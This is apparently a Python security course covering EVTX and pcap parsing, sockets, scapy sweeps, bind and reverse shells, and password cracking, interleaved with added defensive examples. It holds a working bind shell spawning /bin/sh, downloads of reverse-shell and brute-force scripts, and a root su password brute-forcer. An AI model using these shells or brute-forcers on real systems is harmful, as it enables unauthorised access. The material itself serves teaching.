- vi readevtx4.py
- import mmap
- import re
- import contextlib
- import sys
- from xml.dom import minidom
- from operator import itemgetter
- from Evtx.Evtx import FileHeader
- from Evtx.Views import evtx_file_xml_view
- file_name = str(raw_input('Enter EVTX file name without extension : '))
- # file_name = 'WIN-M751BADISCT_System'   # uncomment to hard-code the file while testing
- with open(file_name+'.evtx', 'r') as f:
-     with contextlib.closing(mmap.mmap(f.fileno(), 0,
-                                       access=mmap.ACCESS_READ)) as buf:
-         fh = FileHeader(buf, 0x0)
-         xml_file = "<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?><Events>"
-         try:
-             for xml, record in evtx_file_xml_view(fh):
-                 xml_file += xml
-         except:
-             pass
-         xml_file += "</Events>"
- # Close the unpaired tags and escape bare ampersands so minidom can parse the result
- xml_file = re.sub('<NULL>', '<NULL></NULL>', xml_file)
- xml_file = re.sub('<local>', '<local></local>', xml_file)
- xml_file = re.sub(r'&(?![A-Za-z#][A-Za-z0-9]*;)', '&amp;', xml_file)
- f = open(file_name+'.xml', 'w')
- f.write(xml_file)
- f.close()
- try:
-     xmldoc = minidom.parse(file_name+'.xml')
- except:
-     sys.exit('Invalid file...')
- grandNode = xmldoc.firstChild
- nodes = grandNode.getElementsByTagName('Event')
- events = []
- event_id = 0
- count = 0
- # Collect (event_id, event_name) for every record, then sort by Event ID
- for node in nodes:
-     try:
-         event_id = node.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
-         try:
-             events.append({'event_id' : int(event_id), 'event_name' : node.getElementsByTagName('string')[1].childNodes[0].nodeValue})
-         except:
-             events.append({'event_id' : int(event_id), 'event_name' : 'Name not found...'})
-         count += 1
-     except:
-         continue
- events = sorted(events, key=itemgetter('event_id'))
- for e in events:
-     print e
- sys.exit('...Search Complete...')
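- Added example (not the course's readevtx*.py): once python-evtx has rendered the records to XML, Tasks 2 to 4 (look up by Event ID, count, sort) are plain ElementTree work, so this runs without python-evtx or an .evtx file. Real Event XML puts every element in the Windows event schema namespace, which is why a naive find('EventID') returns nothing; the example handles that. The <Events> document is constructed for this example. Written for Python 3.

```python
# Added example (not the course's readevtx*.py): query the XML that the
# course's scripts write to <file_name>.xml, handling the event namespace.
import xml.etree.ElementTree as ET
from collections import Counter

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed <Events> document in the shape the course's scripts produce.
# Computer name, times and data values are made up.
SAMPLE_EVENTS = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4624</EventID>
  <TimeCreated SystemTime="2015-05-11T10:00:00Z"/><Computer>WIN-EXAMPLE</Computer></System>
  <EventData><Data Name="TargetUserName">alice</Data><Data Name="LogonType">2</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4625</EventID>
  <TimeCreated SystemTime="2015-05-11T10:00:05Z"/><Computer>WIN-EXAMPLE</Computer></System>
  <EventData><Data Name="TargetUserName">admin</Data><Data Name="LogonType">3</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4625</EventID>
  <TimeCreated SystemTime="2015-05-11T10:00:06Z"/><Computer>WIN-EXAMPLE</Computer></System>
  <EventData><Data Name="TargetUserName">admin</Data><Data Name="LogonType">3</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Service Control Manager"/><EventID>7045</EventID>
  <TimeCreated SystemTime="2015-05-11T10:01:00Z"/><Computer>WIN-EXAMPLE</Computer></System>
  <EventData><Data Name="ServiceName">ConstructedSvc</Data></EventData>
</Event>
</Events>
"""

def parse_events(xml_text):
    """Return a list of dicts {'event_id','provider','time','computer','data'}.
    Records without a numeric EventID are skipped rather than aborting the run."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        eid = ev.findtext("e:System/e:EventID", default="", namespaces=NS)
        if not eid.isdigit():
            continue
        prov = ev.find("e:System/e:Provider", NS)
        tc = ev.find("e:System/e:TimeCreated", NS)
        events.append({
            "event_id": int(eid),
            "provider": prov.get("Name") if prov is not None else None,
            "time": tc.get("SystemTime") if tc is not None else None,
            "computer": ev.findtext("e:System/e:Computer", default="", namespaces=NS),
            # <Data Name="..."> children become a plain dict; attributes are not namespaced
            "data": {d.get("Name"): d.text for d in ev.findall("e:EventData/e:Data", NS)},
        })
    return events

def events_with_id(events, event_id):
    """Task 2: every record with the given Event ID."""
    return [e for e in events if e["event_id"] == event_id]

def count_by_id(events):
    """Task 3, generalised to all IDs at once: {event_id: count}."""
    return dict(Counter(e["event_id"] for e in events))

def sorted_by_id(events):
    """Task 4: records ordered by Event ID (stable sort keeps time order within an ID)."""
    return sorted(events, key=lambda e: e["event_id"])

if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for eid, n in sorted(count_by_id(evs).items()):
        print("%-8s: %s - %-8s: %s" % ("Event ID", eid, "Count", n))
```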
- #################################################
- # Lesson 18: Parsing Packets with Python's DPKT #
- #################################################
- The first thing that you will need to do is install dpkt.
- sudo apt-get install -y python-dpkt
- Now cd to your courseware directory, then cd into the subfolder '2-PCAP-Parsing/Resources'.
- Run tcpdump to capture a .pcap file that we will use for the next exercise
- sudo tcpdump -ni eth0 -s0 -w quick.pcap
- --open another command prompt--
- wget http://packetlife.net/media/library/12/tcpdump.pdf
- Let's do something simple:
- vi quickpcap.py
- --------------------------------------------------------
- #!/usr/bin/python
- # Simple script to read the timestamps in a pcap file
- # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html
- import dpkt
- f = open("quick.pcap", "rb")
- pcap = dpkt.pcap.Reader(f)
- for ts, buf in pcap:
-     print ts
- f.close()
- --------------------------------------------------------
- Now let's run the script we just wrote
- python quickpcap.py
- How dpkt breaks down a packet:
- Reference:
- http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html
- src: the MAC address of SOURCE.
- dst: The MAC address of DESTINATION
- type: The protocol type of contained ethernet payload.
- The allowed values are listed in the file "ethernet.py",
- such as:
- a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
- b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.
- References:
- http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python
- sudo tcpdump -ni eth0 -s0 -w capture-100.pcap
- --open another command prompt--
- wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
- Ok - now let's have a look at pcapparsing.py
- --------------------------------------------------------
- import socket
- import dpkt
- import sys
- f = open('capture-100.pcap', 'rb')
- pcapReader = dpkt.pcap.Reader(f)
- for ts,data in pcapReader:
-     ether = dpkt.ethernet.Ethernet(data)
-     # Any frame that is not IP (ARP, for example) stops the script right here
-     if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
-     ip = ether.data
-     tcp = ip.data
-     src = socket.inet_ntoa(ip.src)
-     srcport = tcp.sport
-     dst = socket.inet_ntoa(ip.dst)
-     dstport = tcp.dport
-     print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)
- f.close()
- --------------------------------------------------------
- OK - let's run it:
- python pcapparsing.py
- Running this script might throw an error like this:
- Traceback (most recent call last):
- File "pcapparsing.py", line 9, in <module>
- if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
- If it does, it is just because your capture contains a packet type that the script doesn't handle (ICMP, for example).
- Your homework for today...
- Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.
- Your challenge is to fix the Traceback error
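- Added example (not the course's pcapparsing.py, and not using dpkt): a struct-based pcap walker that does what the homework asks, printing timestamp, addresses and ports, and that skips non-IP and non-TCP/UDP frames instead of raising. The capture bytes are constructed inline by the helpers at the bottom so the block runs offline; the offsets are the standard Ethernet/IPv4 header layout that dpkt decodes for you. Written for Python 3.

```python
# Added example (not the course's pcapparsing.py): walk a libpcap file with
# struct only, decoding Ethernet -> IPv4 -> TCP/UDP and skipping the rest.
import socket
import struct

ETH_TYPE_IP = 0x0800      # same value dpkt exposes as dpkt.ethernet.ETH_TYPE_IP
ETH_TYPE_ARP = 0x0806
IP_PROTO_TCP, IP_PROTO_UDP, IP_PROTO_ICMP = 6, 17, 1

def iter_pcap_records(data):
    """Yield (timestamp, frame_bytes) from a classic libpcap file held in memory.
    The magic number tells us the byte order the writer used."""
    magic = data[:4]
    end = "<" if magic == b"\xd4\xc3\xb2\xa1" else ">" if magic == b"\xa1\xb2\xc3\xd4" else None
    if end is None:
        raise ValueError("not a libpcap file")
    off = 24                                   # skip the 24-byte global header
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield ts_sec + ts_usec / 1e6, data[off:off + incl_len]
        off += incl_len

def decode_frame(frame):
    """Return {'src','dst','sport','dport','proto'} for an IPv4 TCP/UDP frame,
    or None for anything else (ARP, ICMP, ...) instead of raising."""
    if len(frame) < 34:                        # 14 Ethernet + 20 minimum IPv4
        return None
    eth_type = struct.unpack("!H", frame[12:14])[0]
    if eth_type != ETH_TYPE_IP:
        return None                            # e.g. ARP: there is no IP layer to read
    ihl = (frame[14] & 0x0F) * 4               # IPv4 header length in bytes
    proto = frame[23]
    src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
    if proto not in (IP_PROTO_TCP, IP_PROTO_UDP):
        return None                            # e.g. ICMP: no ports
    l4 = 14 + ihl
    sport, dport = struct.unpack("!HH", frame[l4:l4 + 4])
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "proto": "tcp" if proto == IP_PROTO_TCP else "udp"}

def summarise(pcap_bytes):
    """(timestamp, src, sport, dst, dport, proto) for every decodable frame."""
    out = []
    for ts, frame in iter_pcap_records(pcap_bytes):
        d = decode_frame(frame)
        if d:
            out.append((ts, d["src"], d["sport"], d["dst"], d["dport"], d["proto"]))
    return out

# --- constructed test capture (not a real capture) ---------------------------
def _ipv4(src, dst, proto, payload):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + payload

def _eth(eth_type, payload):
    return b"\x00" * 12 + struct.pack("!H", eth_type) + payload

def _pcap(frames):
    gh = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    body = b"".join(struct.pack("<IIII", 1431340800 + i, 0, len(f), len(f)) + f
                    for i, f in enumerate(frames))
    return gh + body

SAMPLE_PCAP = _pcap([
    _eth(ETH_TYPE_IP, _ipv4("10.0.0.5", "10.0.0.1", IP_PROTO_TCP, struct.pack("!HH", 40000, 80) + b"\x00" * 16)),
    _eth(ETH_TYPE_ARP, b"\x00" * 28),                # the frame that makes the course script raise
    _eth(ETH_TYPE_IP, _ipv4("10.0.0.5", "10.0.0.1", IP_PROTO_ICMP, b"\x08\x00" + b"\x00" * 6)),
    _eth(ETH_TYPE_IP, _ipv4("10.0.0.1", "10.0.0.5", IP_PROTO_UDP, struct.pack("!HHHH", 53, 5353, 8, 0))),
])

if __name__ == "__main__":
    for ts, src, sp, dst, dp, proto in summarise(SAMPLE_PCAP):
        print("%.6f %s: %s:%s -> %s:%s" % (ts, proto, src, sp, dst, dp))
```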
- #!/usr/bin/python
- # ARP sniffer: capture ARP packets live with pcapy and decode them with dpkt
- import pcapy
- import dpkt
- import sys
- import socket
- import struct
- SINGLE_SHOT = False
- # list all the network devices
- pcapy.findalldevs()
- iface = "eth0"
- filter = "arp"
- max_bytes = 1024
- promiscuous = False
- read_timeout = 100 # in milliseconds
- pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
- pc.setfilter( filter )
- # callback for received packets
- def recv_pkts( hdr, data ):
-     packet = dpkt.ethernet.Ethernet( data )
-     print type( packet.data )
-     # spa/tpa: sender/target protocol (IP) address; sha/tha: sender/target hardware (MAC) address
-     print "ipsrc: %s, ipdst: %s" %( \
-         socket.inet_ntoa( packet.data.spa ), \
-         socket.inet_ntoa( packet.data.tpa ) )
-     print "macsrc: %s, macdst: %s " % (
-         "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
-         "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )
- if SINGLE_SHOT:
-     header, data = pc.next()
-     recv_pkts( header, data )   # decode the one packet before exiting
-     sys.exit(0)
- else:
-     packet_limit = -1 # infinite
-     pc.loop( packet_limit, recv_pkts ) # capture packets
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your second set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
- #############################################
- # Lesson 19: Python Sockets & Port Scanning #
- #############################################
- $ ncat -l -v -p 1234
- --open another terminal--
- python
- >>> import socket
- >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- >>> s.connect(('localhost', 1234))
- >>> s.send('Hello, world')
- >>> data = s.recv(1024)
- >>> s.close()
- >>> print 'Received', data
- ########################################
- # Lesson 20: TCP Client and TCP Server #
- ########################################
- vi tcpclient.py
- #!/usr/bin/python
- # tcpclient.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- hostport = ("127.0.0.1", 1337)
- s.connect(hostport)
- s.send("Hello\n")
- buf = s.recv(1024)
- print "Received", buf
- vi tcpserver.py
- #!/usr/bin/python
- # tcpserver.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- hostport = ("", 1337)
- s.bind(hostport)
- s.listen(10)
- while 1:
-     cli,addr = s.accept()
-     print "Connection from", addr
-     buf = cli.recv(1024)
-     print "Received", buf
-     if buf == "Hello\n":
-         cli.send("Server ID 1\n")
-     cli.close()
- python tcpserver.py
- --open another terminal--
- python tcpclient.py
- ########################################
- # Lesson 21: UDP Client and UDP Server #
- ########################################
- vi udpclient.py
- #!/usr/bin/python
- # udpclient.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- hostport = ("127.0.0.1", 1337)
- s.sendto("Hello\n", hostport)
- buf = s.recv(1024)
- print buf
- vi udpserver.py
- #!/usr/bin/python
- # udpserver.py
- import socket
- s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- hostport = ("127.0.0.1", 1337)
- s.bind(hostport)
- while 1:
-     buf, address = s.recvfrom(1024)
-     print buf
-     if buf == "Hello\n":
-         s.sendto("Server ID 1\n", address)
- python udpserver.py
- --open another terminal--
- python udpclient.py
- ###############################
- # Lesson 22: Installing Scapy #
- ###############################
- sudo apt-get update
- sudo apt-get install python-scapy python-pyx python-gnuplot
- Reference Page For All Of The Commands We Will Be Running:
- http://samsclass.info/124/proj11/proj17-scapy.html
- Great slides for Scapy:
- http://www.secdev.org/conf/scapy_csw05.pdf
- To run Scapy interactively
- sudo scapy
- ################################################
- # Lesson 23: Sending ICMPv4 Packets with scapy #
- ################################################
- In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:
- i = IP()
- This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:
- i.display()
- Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:
- i.dst="10.65.75.49"
- i.display()
- Notice that scapy automatically fills in your machine's source IP address.
- Use these commands to create an object named ic of type ICMP and display its properties:
- ic = ICMP()
- ic.display()
- Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:
- sr1(i/ic)
- This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. The response is shown, with ICMP type echo-reply.
- The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.
- Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):
- sr1(i/ic/"YOUR NAME")
- You should see a reply with a Raw section containing your name.
- ##############################################
- # Lesson 24: Sending a UDP Packet with Scapy #
- ##############################################
- Preparing the Target
- $ ncat -ulvp 4444
- --open another terminal--
- In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:
- u = UDP()
- u.display()
- This creates an object named u of type UDP, and displays its properties.
- Execute these commands to change the destination port to 4444 and display the properties again:
- i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
- u.dport = 4444
- u.display()
- Execute this command to send the packet to the Windows machine:
- send(i/u/"YOUR NAME SENT VIA UDP\n")
- On the Windows target, you should see the message appear
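Lessons 23 and 24 rely on scapy to fill in the ICMP and UDP headers and checksums. As an added example (Python 3, written for these notes, not taken from the course or from scapy), here is what `IP()/ICMP()/"YOUR NAME"` and `IP()/UDP()/payload` put on the wire, built and parsed by hand with `struct` so it runs offline: the RFC 1071 checksum that scapy computes when `display()` shows `chksum=None`, a parser that verifies it before trusting any field, and the id/seq match that `sr1()` uses to decide a reply belongs to the probe it sent. The `echo_responder()` stand-in for the target host and all identifiers/payload values are constructed for the example.

```python
# Added example (Python 3, not from the course notes or scapy): ICMP echo and UDP headers
# built and parsed by hand, with RFC 1071 checksum computation and verification.
import struct

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0

def inet_checksum(data):
    """RFC 1071 Internet checksum: ones'-complement sum of 16-bit words (odd length is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_icmp_echo(ident, seq, payload=b"", icmp_type=ICMP_ECHO_REQUEST):
    """type(1) code(1) checksum(2) id(2) seq(2), then the Raw payload scapy shows after the header."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    chksum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, chksum, ident, seq) + payload

def parse_icmp(datagram):
    """Header fields, payload and whether the checksum verifies. A receiver checks the checksum
    before trusting anything else: a corrupted or forged message does not sum to zero."""
    if len(datagram) < 8:
        raise ValueError("ICMP message shorter than its 8-byte header")
    icmp_type, code, chksum, ident, seq = struct.unpack("!BBHHH", datagram[:8])
    return {
        "type": icmp_type, "code": code, "checksum": chksum,
        "id": ident, "seq": seq, "payload": datagram[8:],
        "checksum_ok": inet_checksum(datagram) == 0,
    }

def is_reply_to(reply, request):
    """The matching sr1() does for you: a reply belongs to our probe only if it is an echo-reply
    with the same id and seq. Anything else (including unsolicited replies) is ignored."""
    return (reply["checksum_ok"] and reply["type"] == ICMP_ECHO_REPLY
            and reply["id"] == request["id"] and reply["seq"] == request["seq"])

def build_udp(sport, dport, payload):
    """UDP header: sport(2) dport(2) length(2) checksum(2). Over IPv4 the checksum is optional;
    scapy's send(i/u/...) computes it from a pseudo-header, 0 here means 'not computed'."""
    return struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload

def echo_responder(request_bytes):
    """Constructed stand-in for the target host: a valid echo-request gets an echo-reply carrying
    the same id, seq and payload (which is why the reply's Raw section contains YOUR NAME)."""
    req = parse_icmp(request_bytes)
    if not req["checksum_ok"] or req["type"] != ICMP_ECHO_REQUEST:
        return None
    return build_icmp_echo(req["id"], req["seq"], req["payload"], ICMP_ECHO_REPLY)

if __name__ == "__main__":
    probe = build_icmp_echo(ident=0x1234, seq=1, payload=b"YOUR NAME")
    answer = echo_responder(probe)
    print(parse_icmp(answer))
    print("matches our probe:", is_reply_to(parse_icmp(answer), parse_icmp(probe)))
```

`is_reply_to()` is also the reason the Lesson 25 sweep should report the responder's source address rather than `reply.dst`: the destination of a reply is always the local machine.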
- #######################################
- # Lesson 25: Ping Sweeping with Scapy #
- #######################################
- #!/usr/bin/python
- from scapy.all import *
- TIMEOUT = 2
- conf.verb = 0
- for ip in range(0, 256):
-     packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
-     reply = sr1(packet, timeout=TIMEOUT)
-     if reply is not None:
-         # reply.src is the host that answered; reply.dst would be our own address
-         print reply.src, "is online"
-     else:
-         print "Timeout waiting for %s" % packet[IP].dst
- ###############################################
- # Checking out some scapy based port scanners #
- ###############################################
- wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py
- cat rdp_scan.py
- sudo python rdp_scan.py 10.10.30.250
- ######################################
- # Dealing with conf.verb=0 NameError #
- ######################################
- conf.verb = 0
- NameError: name 'conf' is not defined
- Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:
- from scapy import *
- to
- from scapy.all import *
- Reference:
- http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html
- conf.verb = 0 is a verbosity setting (conf = configuration, verb = verbosity); 0 silences scapy's per-packet output.
- Here are some good Scapy references:
- http://www.secdev.org/projects/scapy/doc/index.html
- http://resources.infosecinstitute.com/port-scanning-using-scapy/
- http://www.hackerzvoice.net/ouah/blackmagic.txt
- http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html
- ######################################
- # Lesson 26: Bind and Reverse Shells #
- ######################################
- vi simplebindshell.py
- #!/bin/python
- import os,sys,socket
- ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- print '-Creating socket..'
- port = 31337
- try:
-     ls.bind(('', port))
-     print '-Binding the port on '
-     ls.listen(1)
-     print '-Listening, '
-     (conn, addr) = ls.accept()
-     print '-Waiting for connection...'
-     cli= conn.fileno()
-     print '-Redirecting shell...'
-     os.dup2(cli, 0)
-     print 'In, '
-     os.dup2(cli, 1)
-     print 'Out, '
-     os.dup2(cli, 2)
-     print 'Err'
-     print 'Done!'
-     arg0='/bin/sh'
-     arg1='-a'
-     args=[arg0]+[arg1]
-     os.execv(arg0, args)
- except(socket.error):
-     print 'fail\n'
-     conn.close()
-     sys.exit(1)
- nc TARGETIP 31337
- ---------------------
- Preparing the target for a reverse shell
- $ ncat -lvp 4444
- --open another terminal--
- wget https://www.trustedsec.com/files/simple_py_shell.py
- vi simple_py_shell.py
- -------------------------------
- Tricky shells
- Reference:
- http://securityweekly.com/2011/10/python-one-line-shell-code.html
- http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
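The bind shell in this lesson works by `dup2()`-ing a socket onto file descriptors 0, 1 and 2 before exec'ing `/bin/sh`. On Linux that leaves a visible trace in `/proc`: the process's `fd/0`, `fd/1` and `fd/2` are symlinks to `socket:[inode]` instead of a tty or pipe. As an added example (Python 3, not from the course notes), here is a small scanner that flags such processes. The `/proc` reading is kept separate from the classification so the logic can be exercised on constructed input; `SHELL_NAMES` and the labels are this example's own.

```python
# Added example (Python 3, not from the course notes): find processes whose standard
# descriptors are all sockets, the footprint of a dup2()-based bind or reverse shell.
import os

SHELL_NAMES = {"sh", "bash", "dash", "zsh", "python", "perl"}  # constructed watch list

def stdio_targets(pid, proc_root="/proc"):
    """Return {fd: symlink target} for fds 0-2 of pid, or {} if any cannot be read."""
    out = {}
    for fd in (0, 1, 2):
        try:
            out[fd] = os.readlink("%s/%d/fd/%d" % (proc_root, pid, fd))
        except OSError:            # process exited, or we lack permission
            return {}
    return out

def stdio_is_socket(targets):
    """True when all three standard descriptors point at a socket."""
    return len(targets) == 3 and all(t.startswith("socket:[") for t in targets.values())

def classify(comm, targets):
    """Label one process from its command name and stdio link targets."""
    if not stdio_is_socket(targets):
        return "ok"
    return "suspicious-shell" if comm in SHELL_NAMES else "socket-stdio"

def scan(proc_root="/proc"):
    """Walk proc_root; return [(pid, comm, label)] for every process not labelled 'ok'."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open("%s/%d/comm" % (proc_root, pid)) as fh:
                comm = fh.read().strip()
        except OSError:
            continue
        label = classify(comm, stdio_targets(pid, proc_root))
        if label != "ok":
            findings.append((pid, comm, label))
    return findings

if __name__ == "__main__":
    for pid, comm, label in scan():
        print(pid, comm, label)
```

Expect some `socket-stdio` hits on a normal system (socket-activated or inetd-style daemons inherit a socket as stdio), so the interesting rows are the `suspicious-shell` ones: an interpreter or shell with no terminal and all three descriptors on the same socket. Run it as root to see every process's `fd` directory.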
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your third set of youtube videos that I'd like for you to watch:
- https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
- #################################################
- # Lesson 27: Python Functions & String Handling #
- #################################################
- Python can make use of functions:
- http://www.tutorialspoint.com/python/python_functions.htm
- Python can interact with the 'crypt' function used to create Unix passwords:
- http://docs.python.org/2/library/crypt.html
- Tonight we will see a lot of the split() method so be sure to keep the following references close by:
- http://www.tutorialspoint.com/python/string_split.htm
- Tonight we will see a lot of slicing so be sure to keep the following references close by:
- http://techearth.net/python/index.php5?title=Python:Basics:Slices
- ################################
- # Lesson 28: Password Cracking #
- ################################
- wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py
- vi htcrack.py
- vi list.txt
- hello
- goodbye
- red
- blue
- yourname
- tim
- bob
- htpasswd -nd yourname
- - enter yourname as the password
- python htcrack.py joe:7XsJIbCFzqg/o list.txt
- sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
- rm -rf mechanize-0.2.5.tar.gz
- sudo /bin/bash
- passwd
- ***set root password***
- vi rootbrute.py
- #!/usr/bin/env python
- import sys
- try:
-     import pexpect
- except(ImportError):
-     print "\nYou need the pexpect module."
-     print "http://www.noah.org/wiki/Pexpect\n"
-     sys.exit(1)
- #Change this if needed.
- # LOGIN_ERROR = 'su: incorrect password'
- LOGIN_ERROR = "su: Authentication failure"
- def brute(word):
-     print "Trying:",word
-     child = pexpect.spawn('/bin/su')
-     child.expect('Password: ')
-     child.sendline(word)
-     i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
-     if i == 1:
-         print "Incorrect Password"
-     if i == 2:
-         print "\n\t[!] Root Password:" ,word
-         child.sendline ('id')
-         print child.before
-         child.interact()
- if len(sys.argv) != 2:
-     print "\nUsage : ./rootbrute.py <wordlist>"
-     print "Eg: ./rootbrute.py words.txt\n"
-     sys.exit(1)
- try:
-     words = open(sys.argv[1], "r").readlines()
- except(IOError):
-     print "\nError: Check your wordlist path\n"
-     sys.exit(1)
- print "\n[+] Loaded:",len(words),"words"
- print "[+] BruteForcing...\n"
- for word in words:
-     brute(word.replace("\n",""))
- References you might find helpful:
- http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
- wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py
- vi md5crack.py
- Why use hexdigest
- http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
- http://md5online.net/
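The per-word check inside htcrack.py and md5crack.py, and the `hexdigest()` question linked above, come down to the same thing: compute the candidate's hash in the exact representation the stored value uses, then compare. As an added example (Python 3, not the course's scripts), here is that check for the htpasswd formats `hashlib` can produce on its own: `{SHA}` entries (base64 of the raw SHA-1 digest) and plain MD5 hex strings. The 13-character DES crypt entries that `htpasswd -nd` produces need the Unix `crypt(3)` call and are only classified here, not verified. The entry format names and the `check_wordlist()` helper are this example's own.

```python
# Added example (Python 3, not htcrack.py or md5crack.py): classify an htpasswd entry and
# check a candidate against it. Shows the digest()/hexdigest() distinction and uses a
# constant-time comparison, as any verifier should.
import base64
import hashlib
import hmac

HEX = set("0123456789abcdefABCDEF")

def parse_htpasswd_line(line):
    """'user:hash' -> (user, hash); raises on a malformed line."""
    user, sep, stored = line.strip().partition(":")
    if not sep or not user or not stored:
        raise ValueError("not a user:hash line: %r" % line)
    return user, stored

def hash_kind(stored):
    """Classify an entry by prefix or length (names are this example's own)."""
    if stored.startswith("{SHA}"):
        return "sha1-base64"
    if stored.startswith("$apr1$"):
        return "apr1-md5"          # Apache's iterated MD5; needs a dedicated implementation
    if len(stored) == 13:
        return "des-crypt"         # htpasswd -d: 2-char salt, password truncated to 8 chars
    if len(stored) == 32 and all(c in HEX for c in stored):
        return "md5-hex"
    return "unknown"

def matches(stored, candidate):
    """Constant-time check of candidate against the formats handled here."""
    kind = hash_kind(stored)
    pw = candidate.encode()
    if kind == "sha1-base64":
        # the stored value is base64 of the 20 raw digest bytes, so encode digest(), not hexdigest()
        computed = base64.b64encode(hashlib.sha1(pw).digest()).decode()
        return hmac.compare_digest(computed, stored[len("{SHA}"):])
    if kind == "md5-hex":
        # the stored value is 32 ASCII hex chars: compare hexdigest(); digest() is 16 raw bytes
        # and would never be equal to the string (the pitfall from the StackOverflow question)
        return hmac.compare_digest(hashlib.md5(pw).hexdigest(), stored.lower())
    raise NotImplementedError("format %s is not verified in this example" % kind)

def check_wordlist(entry, words):
    """Return the first word that reproduces the stored hash, or None."""
    _, stored = parse_htpasswd_line(entry)
    for word in words:
        word = word.rstrip("\n")
        if matches(stored, word):
            return word
    return None

if __name__ == "__main__":
    # constructed entry for the example: {SHA} hash of "yourname", as `htpasswd -ns` would store it
    entry = "joe:{SHA}" + base64.b64encode(hashlib.sha1(b"yourname").digest()).decode()
    print(hash_kind(entry.split(":", 1)[1]), check_wordlist(entry, ["hello", "goodbye", "yourname", "tim"]))
```

Unsalted MD5 and SHA-1 entries fall to a wordlist this quickly because every user with the same password has the same hash and nothing slows the attacker down; that is the practical argument for bcrypt-style entries (`htpasswd -B`) over the formats this lesson cracks.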
- wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py
- #############################
- # Reference Videos To Watch #
- #############################
- Here is your fourth set of youtube videos that I'd like for you to watch:
